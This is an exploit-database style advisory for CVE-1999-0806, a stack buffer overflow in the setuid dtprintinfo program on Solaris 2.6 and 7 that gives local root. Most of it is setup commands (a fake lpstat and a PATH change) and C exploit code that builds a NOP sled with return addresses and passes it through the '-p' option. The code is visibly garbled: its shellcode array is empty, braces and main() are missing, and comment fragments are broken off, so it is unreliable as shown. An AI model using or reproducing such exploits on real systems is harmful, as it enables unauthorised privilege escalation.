Sun Solaris 7.0 - '/usr/dt/bin/dtprintinfo' Local Buffer Overflow

Related Vulnerabilities: CVE-1999-0806  
Publish Date: 10 May 1999

The dtprintinfo is a setuid commands open the CDE Print Manager window. A stack based buffer overflow in the handling of the "-p" option allow the execution of arbitrary code as root.

This vulnerablity has been assigned Sun Bug# 4139394. The vulnerability is in the CDE 1.2 and CDE 1.3 subsystem of Solaris 2.6 and Solaris 7 respectibly. 

Before executing the ex_dtprintinfo exploit set your DISPLAY environment variable correctly, and make a dummy lpstat command like:

% cat > lpstat
echo "system for lpprn:"
% chmod 755 lpstat
% setenv PATH .:$PATH
% gcc ex_dtprintinfo.c
% a.out 

   ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
   The Shadow Penguin Security (
   Written by UNYUN (
static char             x[1000];
#define ADJUST          0
#define STARTADR        621
#define BUFSIZE         900
#define NOP             0x90
unsigned long ret_adr;
int     i;
char exploit_code[] =

unsigned long get_sp(void)
  __asm__(" movl %esp,%eax ");
        for (i=0;i<BUFSIZE;i++) x[i]=NOP;
        for (i=0;i<strlen(exploit_code);i++)
        ret_adr=get_sp() - 1292 + 148;
        for (i = ADJUST; i < 400 ; i+=4){
                x[i+0]=ret_adr & 0xff;
                x[i+1]=(ret_adr >> 8 ) &0xff;
                x[i+2]=(ret_adr >> 16 ) &0xff;
                x[i+3]=(ret_adr >> 24 ) &0xff;
        execl("/usr/dt/bin/dtprintinfo", "dtprintinfo",
        "-p",x,(char *) 0);